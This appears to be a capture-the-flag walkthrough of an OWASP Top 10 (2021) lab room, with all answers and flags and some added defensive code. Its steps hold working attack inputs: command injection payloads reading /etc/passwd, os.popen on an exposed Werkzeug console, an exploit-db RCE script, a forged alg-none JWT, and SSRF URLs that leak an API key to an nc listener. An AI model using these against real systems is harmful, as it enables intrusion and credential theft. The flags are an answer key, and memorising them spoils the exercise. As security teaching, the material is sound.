
OWASP Top 10 - 2021
This guide contains the answers, and the steps needed to reach them, for the OWASP Top 10 - 2021 room.
Table of contents
- Broken Access Control (IDOR Challenge)
- Cryptographic Failures (Challenge)
- Command Injection
- Insecure Design
- Security Misconfiguration
- Vulnerable and Outdated Components - Lab
- Identification and Authentication Failures Practical
- Software Integrity Failures
- Data Integrity Failures
- Security Logging and Monitoring Failures
- Server-Side Request Forgery (SSRF)
Broken Access Control (IDOR Challenge)
Read and understand how IDOR works.
Deploy the machine and go to http://MACHINE_IP - Login with the username noot and the password test1234.
-
Look at other users' notes. What is the flag?
First we log in to the page with the provided credentials.

On this page we can view our notes. Notice the id parameter visible in the address bar: it is the only thing that decides which note is shown, and nothing checks that the note belongs to us.

We can try different numbers to get to another user's notes.

Click for answer
flag{fivefourthree}
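To make the flaw behind this task concrete, here is an added example (not part of the room or this walkthrough) of the vulnerable lookup beside its fix, together with the id sweep that "trying different numbers" amounts to. The note store is constructed in memory; the owner noot is the account from the task, while alice and the note bodies are made up.

```python
from typing import Callable, Iterable, Optional

# Constructed note store standing in for the room's database. "noot" is the
# account from the task; "alice" and the note bodies are made up.
NOTES = {
    1: {"owner": "noot", "body": "noot's shopping list"},
    2: {"owner": "alice", "body": "alice's private note"},
    3: {"owner": "alice", "body": "alice's other note"},
}


def get_note_vulnerable(note_id: int, current_user: str) -> Optional[dict]:
    """IDOR: the id from the URL is trusted; being logged in is the only check."""
    return NOTES.get(note_id)


def get_note_fixed(note_id: int, current_user: str) -> Optional[dict]:
    """Authorisation, not just authentication: the note must belong to the caller."""
    note = NOTES.get(note_id)
    if note is None or note["owner"] != current_user:
        # Same result for "missing" and "not yours", so the id space cannot be mapped.
        return None
    return note


def sweep_ids(fetch: Callable[[int, str], Optional[dict]], user: str,
              ids: Iterable[int]) -> list[int]:
    """Change the id parameter in a loop and record which ids return a note."""
    return [i for i in ids if fetch(i, user) is not None]
```

Against the vulnerable lookup, noot's sweep returns every existing id; against the fixed one it returns only noot's own note, and ids that exist but belong to someone else are indistinguishable from ids that do not exist.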
Cryptographic Failures (Challenge)
Have a look around the web app. The developer has left themselves a note indicating that there is sensitive data in a specific directory.
-
What is the name of the mentioned directory?
Looking at the page source of the website, we find a developer comment pointing to an interesting directory.

Click for answer
/assets -
Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?
Looking through the assets folder we see a database that might be of interest to us.

Click for answer
webapp.db -
Use the supporting material to access the sensitive data. What is the password hash of the admin user?
There are two ways to obtain the admin hash.
The first is to open the database with sqlite3 and query the users table:

```sh
sqlite3 webapp.db
```

Then, at the sqlite3 prompt:

```sql
.tables
PRAGMA table_info(users);
SELECT * FROM users;
```
Another method is to use a viewer such as DB Browser for SQLite and view the database.

Click for answer
6eea9b7ef19179a06954edd0f6c05ceb
Crack the hash.
-
What is the admin's plaintext password?
If the type is not obvious from the hash itself, hash-identifier will suggest likely hash types.
A 32-character hexadecimal string is most likely MD5. We can crack it with hashcat in MD5 mode (-m 0) against the rockyou wordlist:

```sh
hashcat -m 0 6eea9b7ef19179a06954edd0f6c05ceb /usr/share/wordlists/rockyou.txt
```
Click for answer
qwertyuiop -
Log in as the admin. What is the flag?
With our newly found credentials, we can log in as an admin and get our flag.

Click for answer
THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}
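As an added illustration (not from the room or this walkthrough), the following Python reproduces the two steps above offline: the length-and-charset heuristic that hash-identifier applies, and the dictionary attack hashcat runs. The hash is the one recovered above; the wordlist is a constructed stand-in for rockyou.txt.

```python
import hashlib
import re

# Hash recovered from webapp.db above. The wordlist is a constructed stand-in
# for rockyou.txt so the example runs offline.
TARGET = "6eea9b7ef19179a06954edd0f6c05ceb"
WORDLIST = ["123456", "password", "qwerty", "qwertyuiop", "letmein"]

# Digest length in hex characters -> algorithms that produce it. This is the
# cheap check hash-identifier performs; it yields candidates, not certainty,
# because several algorithms share a digest length.
HEX_LENGTHS = {32: ["md5", "ntlm"], 40: ["sha1"], 64: ["sha256"], 128: ["sha512"]}


def identify(h: str) -> list[str]:
    """Return candidate algorithms for a hex digest, or [] if it is not hex."""
    if not re.fullmatch(r"[0-9a-fA-F]+", h):
        return []
    return HEX_LENGTHS.get(len(h), [])


def dictionary_attack(target: str, words, algo: str = "md5"):
    """Hash every candidate and compare: what hashcat -m 0 does, minus the GPU."""
    target = target.lower()
    for word in words:
        if hashlib.new(algo, word.encode()).hexdigest() == target:
            return word
    return None
```

The reason this works at all is the cryptographic failure the task is named after: the application stores an unsalted, fast hash. Every user who chose the same password has the same hash, and a single pass over the wordlist recovers all of them. A slow, salted password hash (bcrypt, scrypt, Argon2) would turn this into a per-user job measured in hours rather than milliseconds.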
Command Injection
-
What strange text file is in the website's root directory?
On the page we see an input box that is vulnerable to command injection: the value we enter is passed to a shell command on the server.

An easy way to test this is to enter `; ls`. The semicolon ends the command the application intended to run, so if the input is vulnerable the output will include a listing of the files in the current folder.

Click for answer
drpepper.txt -
How many non-root/non-service/non-daemon users are there?
We can list all existing accounts by reading the passwd file:

```sh
; cat /etc/passwd
```

Regular (human) accounts normally have a UID of 1000 or higher and a real login shell; system and daemon accounts use low UIDs and a shell such as /sbin/nologin. Going through this list, no entry meets those criteria.

Click for answer
0 -
What user is this app running as?
For this we can use the whoami command to find the current user:

```sh
; whoami
```
Click for answer
apache -
What is the user's shell set as?
For this we can again read the passwd file and filter for the apache user found in the previous question; the last field of the entry is its shell.

```sh
; grep apache /etc/passwd
```
Click for answer
sbin/nologin -
What version of Alpine Linux is running?
For this we need to read the alpine-release file:

```sh
; cat /etc/alpine-release
```
Click for answer
3.16.0
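Added example, not code from the room's application (the walkthrough does not show its source): the pattern that makes `; ls` work, beside two fixes. It assumes the vulnerable app builds a shell command string around the user's input; `echo` stands in for whatever command the real app runs, and the payload is constructed so the result does not depend on the server's directory contents. It needs a POSIX shell.

```python
import re
import subprocess
from typing import Optional

# Constructed attacker input: a harmless value followed by a chained command.
# In the room the payload was "; ls"; "echo INJECTED" is used here so the
# outcome is deterministic.
PAYLOAD = "hello; echo INJECTED"


def vulnerable_greet(name: str) -> str:
    """The bug class in this task: user input concatenated into a shell string."""
    cmd = f"echo {name}"  # "; ..." in name becomes a second command
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout


def safe_greet(name: str) -> str:
    """Fix 1: pass the input as one argv element; no shell ever parses it."""
    out = subprocess.run(["echo", name], capture_output=True, text=True)
    return out.stdout


# Fix 2 (defence in depth): strict allowlist of what the field may contain.
ALLOWED = re.compile(r"[A-Za-z0-9 _.-]{1,64}")


def validated_greet(name: str) -> Optional[str]:
    """Reject anything outside the allowlist; only then run the safe version."""
    if not ALLOWED.fullmatch(name):
        return None
    return safe_greet(name)
```

With the payload above, the vulnerable version prints two lines, the second being the injected command's output; the safe version prints the payload back literally, and the validated version refuses it because of the semicolon.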
Insecure Design
-
What is the value of the flag in joseph's account?
Looking at the password reset form, we see there are several security questions. The color question is easily guessable, as there are only 11 basic colors and nothing stops us from trying them all.

After guessing the correct color, we get a new password for the account.

Now we can log in with these credentials and see Joseph's files.

Here we will also find our flag.

Click for answer
THM{Not_3ven_c4tz_c0uld_sav3_U!}
Security Misconfiguration
Navigate to http://10.10.30.226:86/console to access the Werkzeug console.
Use the Werkzeug console to run the following Python code to execute the ls -l command on the server:

```python
import os; print(os.popen("ls -l").read())
```
-
What is the database file name (the one with the .db extension) in the current directory?
After inputting the command in the console, we get the following list of files. One of which is our database.

Click for answer
todo.db -
Modify the code to read the contents of the app.py file, which contains the application's source code. What is the value of the secret_flag variable in the source code?
To read the contents of app.py, I changed the command to:

```python
import os; print(os.popen("cat app.py").read())
```
Click for answer
THM{Just_a_tiny_misconfiguration}
Vulnerable and Outdated Components - Lab
-
What is the content of the /opt/flag.txt file?
Looking at the site, we can see it is some sort of bookstore (CSE bookstore).

Searching exploit-db for this application gives several results, but not the one we are looking for; the search terms matter. Searching for

```
online book store
```

gives us the RCE exploit we are looking for.

After downloading it, we can run it with Python, passing the URL of the site as an argument:

```sh
sudo python3 ~/Downloads/47887.py http://10.10.30.226:84
```

This gives us remote command execution on the server and lets us read the flag.

Click for answer
THM{But_1ts_n0t_my_f4ult!}
Identification and Authentication Failures Practical
-
What is the flag that you found in darren's account?
We first register an account with the same name and an added whitespace in front.


Now we can log in with this account (remember to use the extra space) and find the flag.

Click for answer
fe86079416a21a3c99937fea8874b667
Now try to do the same trick and see if you can log in as arthur.
-
What is the flag that you found in arthur's account?
Again, we first register an account with the same name and an added whitespace in front.

Now we can log in with this account (remember to use the extra space) and find the flag.

Click for answer
d9ac0f7db4fda460ac3edeb75d75e16e
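Added example (not code from the room's application, whose source the walkthrough does not show) of why the leading-whitespace trick works and how registration should canonicalise usernames before checking uniqueness. The user store is constructed in memory; the assumed bug is an exact-string uniqueness check combined with code elsewhere that trims the name, which is consistent with the behaviour seen above.

```python
import unicodedata


class UserStore:
    """Constructed in-memory user table standing in for the room's database."""

    def __init__(self) -> None:
        self.users: dict[str, str] = {}

    def register_vulnerable(self, username: str, password: str) -> bool:
        # Exact-string uniqueness: " darren" is a new key, even though the rest
        # of the app (and anyone reading the screen) treats it as darren.
        if username in self.users:
            return False
        self.users[username] = password
        return True

    @staticmethod
    def canonical(username: str) -> str:
        """One canonical form used for both comparison and storage.

        NFKC folds look-alike code points (full-width letters, ligatures),
        casefold removes case differences, and split/join collapses leading,
        trailing and repeated internal whitespace.
        """
        folded = unicodedata.normalize("NFKC", username).casefold()
        return " ".join(folded.split())

    def register_fixed(self, username: str, password: str) -> bool:
        key = self.canonical(username)
        if not key or key in self.users:
            return False
        self.users[key] = password
        return True


def second_registration_accepted(first: str, second: str, fixed: bool) -> bool:
    """Register `first`, then `second`; report whether the second got through."""
    store = UserStore()
    register = store.register_fixed if fixed else store.register_vulnerable
    register(first, "pw1")
    return register(second, "pw2")
```

The fixed version rejects " darren", "DARREN" and a full-width "ｄarren" as duplicates of darren, while still allowing genuinely different names. The same canonical form must be used at login, or the fix only moves the mismatch.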
Software Integrity Failures
-
What is the SHA-256 hash of https://code.jquery.com/jquery-1.12.4.min.js?
Navigating to the supplied website and inputting the source's URL gives us the hash.

Click for answer
sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ=
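Added example, not part of the room or this walkthrough: how the value above is computed and what the browser does with it. Subresource Integrity hashes the exact bytes of the script and encodes the raw digest in Base64 behind an algorithm prefix. The script body here is constructed so the example runs offline; the real answer hashes the bytes served at https://code.jquery.com/jquery-1.12.4.min.js, which this code does not fetch.

```python
import base64
import hashlib

# Constructed script body standing in for a third-party script. The task's
# answer hashes the real bytes of jquery-1.12.4.min.js; this does not fetch them.
SCRIPT = b"/* constructed stand-in for a third-party script */\nwindow.ready = true;\n"

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_hash(content: bytes, algo: str = "sha256") -> str:
    """Integrity value as the browser expects it: '<algo>-' + Base64 of the raw digest."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def script_tag(src: str, content: bytes) -> str:
    """The tag a page author emits after pinning the exact bytes they reviewed."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


def browser_accepts(content: bytes, integrity: str) -> bool:
    """What the browser does on load: recompute, compare, refuse to run on mismatch."""
    algo, _, _ = integrity.partition("-")
    if algo not in SRI_ALGORITHMS:
        return False  # this example only handles the algorithms SRI defines
    return sri_hash(content, algo) == integrity
```

If the CDN copy changes by a single byte, the recomputed hash no longer matches and the script is not executed. That is the whole point of the task: the integrity attribute pins the dependency to the bytes you reviewed, not to a URL you merely trust.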
Data Integrity Failures
-
Try logging into the application as guest. What is guest's account password?
Trying to log in to the site, we get a notification with default credentials we can use.

Click for answer
guest -
What is the name of the website's cookie containing a JWT token?
Looking at the cookies in the developer tools (F12), we can see our JWT cookie.

Click for answer
jwt-session
Use the knowledge gained in this task to modify the JWT token so that the application thinks you are the user "admin".
-
What is the flag presented to the admin user?
Now we take the first and second part of this session cookie (the header and the payload) and decode them with CyberChef from Base64. Then we change the alg value to none and the username to admin. Then we encode both strings back to Base64 separately and join them with a period, keeping the trailing period where the signature used to be (with alg none the signature is empty, but the separator must remain). Note that JWT segments are base64url encoded: they use - and _ instead of + and / and carry no = padding, so strip any padding CyberChef adds.

```
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjk2MjUxMjU0fQ.
```
After refreshing the page, we can see our flag.

Click for answer
THM{Dont_take_cookies_from_strangers}
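Added example (not from the room or this walkthrough) that performs the forgery above in code instead of CyberChef, and shows the server-side check that stops it. The guest token is constructed here with a placeholder signature; only the claim names and the exp value are taken from the walkthrough. Because the header and payload keep the same key order and compact JSON as the cookie, the forged token comes out byte-for-byte identical to the one above.

```python
import base64
import json


def b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url without padding; restore padding before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def encode_segment(obj: dict) -> str:
    # Compact separators: the room's cookie has no whitespace inside the JSON.
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


# Constructed guest token standing in for the jwt-session cookie. The signature
# segment is a placeholder, because forging with alg=none never checks it.
GUEST_TOKEN = ".".join([
    encode_segment({"typ": "JWT", "alg": "HS256"}),
    encode_segment({"username": "guest", "exp": 1696251254}),
    "c2lnbmF0dXJl",
])


def forge_none(token: str, **claims) -> str:
    """Set alg to none, overwrite claims, drop the signature but keep its dot."""
    header_seg, payload_seg, _signature = token.split(".")
    header = json.loads(b64url_decode(header_seg))
    payload = json.loads(b64url_decode(payload_seg))
    header["alg"] = "none"
    payload.update(claims)
    return f"{encode_segment(header)}.{encode_segment(payload)}."


def header_alg_allowed(token: str, allowed: tuple[str, ...] = ("HS256",)) -> bool:
    """Server-side fix, first gate: pin the algorithm allowlist before verifying.

    A library call such as PyJWT's jwt.decode(token, key, algorithms=["HS256"])
    does this together with the signature check; "none" must never be listed.
    """
    header = json.loads(b64url_decode(token.split(".")[0]))
    return header.get("alg") in allowed
```

The vulnerable server reads alg from the token it is supposed to be verifying and, on none, skips the signature check entirely. Deciding the accepted algorithm on the server side, never from the token, closes the hole regardless of what the client sends.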
Security Logging and Monitoring Failures
-
What IP address is the attacker using?
After opening and analysing the file, we can see the attacker's IP address: it is the one responsible for the long run of failed logins.

Click for answer
49.99.13.16 -
What kind of attack is being carried out?
Trying many username and password combinations in quick succession is a brute-force login attack.
Click for answer
Brute force
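Added example, not part of the room: the detection a log-monitoring pipeline would run to arrive at the two answers above automatically. The log lines are constructed in a simple "timestamp ip event user" layout and are not the room's file; the format the room uses is not reproduced in this walkthrough, so the regular expression would need adjusting for a real source. 203.0.113.10 plays the attacker (an RFC 5737 documentation address).

```python
import re
from collections import defaultdict

# Constructed log excerpt; not the room's log file. 203.0.113.10 is the attacker.
LOG = """\
2023-10-01T10:00:01Z 198.51.100.7 login FAILED user=bob
2023-10-01T10:00:09Z 198.51.100.7 login OK user=bob
2023-10-01T10:01:00Z 203.0.113.10 login FAILED user=admin
2023-10-01T10:01:01Z 203.0.113.10 login FAILED user=admin
2023-10-01T10:01:02Z 203.0.113.10 login FAILED user=admin
2023-10-01T10:01:03Z 203.0.113.10 login FAILED user=admin
2023-10-01T10:01:04Z 203.0.113.10 login FAILED user=admin
2023-10-01T10:01:05Z 203.0.113.10 login FAILED user=admin
2023-10-01T10:01:06Z 203.0.113.10 login FAILED user=admin
2023-10-01T10:01:07Z 203.0.113.10 login FAILED user=admin
2023-10-01T10:02:30Z 192.0.2.44 login OK user=carol
"""

LINE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) login "
    r"(?P<result>OK|FAILED) user=(?P<user>\S+)$"
)


def failed_logins(log: str) -> dict[str, list[str]]:
    """Map each source IP to the usernames it failed to log in as, in order."""
    failures: dict[str, list[str]] = defaultdict(list)
    for line in log.splitlines():
        m = LINE.match(line)
        if m and m["result"] == "FAILED":
            failures[m["ip"]].append(m["user"])
    return dict(failures)


def suspicious_sources(log: str, threshold: int = 5) -> dict[str, str]:
    """Flag IPs at or above the failure threshold and name the attack pattern.

    Many failures against one account is a brute-force attempt on its password;
    the same number spread across many accounts is password spraying.
    """
    verdicts = {}
    for ip, users in failed_logins(log).items():
        if len(users) < threshold:
            continue
        verdicts[ip] = "password spraying" if len(set(users)) > 1 else "brute force"
    return verdicts
```

A single failed login followed by success (bob) stays below the threshold and is not flagged; eight failures from one address against one account is reported as brute force. In a real deployment the count would be taken over a time window, and the alert would feed a lockout or rate limit rather than just a report.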
Server-Side Request Forgery (SSRF)
-
Explore the website. What is the only host allowed to access the admin area?
On the website, we can find the admin panel through the hamburger menu.

Here we can see that we are not allowed to access it.

Click for answer
localhost -
Check the "Download Resume" button. Where does the server parameter point to?
If we look at the download link, it points to an external server to get the resume.

Click for answer
secure-file-storage.com -
Using SSRF, make the application send the request to your AttackBox instead of the secure file storage. Are there any API keys in the intercepted request?
We must first point the server parameter at our AttackBox and a port of our choosing:

```
10.10.42.94:8087/download?server=10.18.78.136:1337&id=75482342
```

After setting up a listener with netcat we receive the server's request, and the API key is sent along with it:

```sh
nc -nlvp 1337
```

Click for answer
THM{Hello_Im_just_an_API_key}
Going the Extra Mile: There's a way to use SSRF to gain access to the site's admin area. Can you find it?
Note: You won't need this flag to progress in the room. You are expected to do some research in order to achieve your goal.
To get access, we can try to make the download feature request its own admin page, so that the request appears to come from localhost.
I tried several things.
First, I changed the server parameter to localhost (127.0.0.1) and appended the admin path. The original link:

```
http://10.10.42.94:8087/download?server=secure-file-storage.com:8087&id=75482342
```

became:

```
http://10.10.42.94:8087/download?server=127.0.0.1:8087/admin&id=75482342
```

This still downloaded the resume, presumably because the application appends the id part after whatever is in the server parameter. Removing the id parameter was not an option either: the application then responds with an error saying no file is selected.
The way around this is a `#`. Anything after `#` in a URL is a fragment, which an HTTP client never sends, so the path and query the server appends after our value are silently dropped and the request goes to /admin on 127.0.0.1. The `#` has to be URL-encoded as `%23`; otherwise our own browser treats it as the fragment of the link we are clicking and never sends it to the application. Adding this to the URL gives us a PDF version of the admin panel.

```
http://10.10.42.94:8087/download?server=127.0.0.1:8087/admin%23&id=75482342
```